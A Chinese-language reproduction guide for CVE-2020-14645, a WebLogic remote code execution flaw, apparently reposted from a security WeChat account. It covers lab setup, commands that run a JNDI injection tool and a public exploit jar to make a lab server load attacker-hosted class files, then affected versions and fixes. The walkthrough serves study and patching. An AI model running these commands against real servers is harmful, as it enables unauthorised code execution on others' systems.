CVE-2020-14645 | Weblogic远程代码执行漏洞复现
0x01 漏洞简述
WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。
0x02 环境搭建
WebLogic 12.2.1.4官方下载链接:
https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_lite_Disk1_1of1.zip
下载JDK 6u211/7u201/8u191任意版本并配置环境变量
JDK8u191
下载地址:https://pan.baidu.com/s/1cCtSolwsZCmL7xN6orTjTw
提取码:nmi1
用管理员权限打开CMD命令
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
疯狂点击下一步进行安装,并勾选自助启动配置向导选项
进入配置向导,创建新域并勾选全部模板,直至安装完成
安装成功后,跳到base_domain目录下
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
运行startWebLogic.cmd
可访问7001端口,说明环境部署成功
0x03 漏洞复现
JNDI工具下载地址
https://github.com/welk1n/JNDI-Injection-Exploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]
使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件
使用CVE-2020-14645漏洞验证工具
https://github.com/DSO-Lab/Weblogic_CVE-2020-14645
java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.33.250:7001
输入命令请求LDAP服务,执行自动编译的class文件,成功弹出计算器
0x04 影响范围
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
0x05 修复方案
- Oracle官方已经发布了安全公告及相关补丁信息,修复了此漏洞,建议受影响用户尽快升级到安全版本。
- 漏洞产生于WebLogic默认启用的T3协议,可限制T3访问来源阻止攻击。
- 禁用IIOP协议。
参考链接:
https://www.oracle.com/security-alerts/cpujul2020.html
https://github.com/DSO-Lab/Weblogic_CVE-2020-14645
https://github.com/welk1n/JNDI-Injection-Exploit
https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html
文章来源:
微信公众号:nearsec